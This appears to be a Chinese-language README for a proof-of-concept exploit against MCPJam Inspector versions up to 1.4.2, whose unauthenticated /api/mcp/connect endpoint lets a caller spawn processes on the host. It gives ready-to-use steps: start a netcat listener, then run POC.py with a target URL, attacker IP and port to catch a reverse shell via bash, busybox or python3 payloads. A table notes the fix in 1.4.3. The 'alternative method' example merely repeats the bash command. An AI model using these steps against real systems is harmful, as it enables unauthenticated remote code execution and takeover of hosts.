MCPJam Inspector <= 1.4.2 默认绑定到 0.0.0.0,并公开 /api/mcp/connect 接口,且无需任何身份验证。该接口接受一个 serverConfig 对象,该对象会直接在主机上生成进程——传入反弹 shell 载荷即可在无需任何凭据的情况下立即获得 RCE。
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
步骤 1 — 启动你的监听器:
nc -lvnp 4444
步骤 2 — 运行漏洞利用脚本:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
如果目标上 busybox 不可用,请尝试其他方法:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| 软件 | 受影响版本 | 修复版本 |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |
| Flag | 描述 | 默认值 |
|---|
-u | 目标 URL | 必填 |
-i | 你的监听 IP(LHOST) | 必填 |
-p | 你的监听端口(LPORT) | 必填 |
-m | 载荷方法:busybox、bash、python3 | busybox |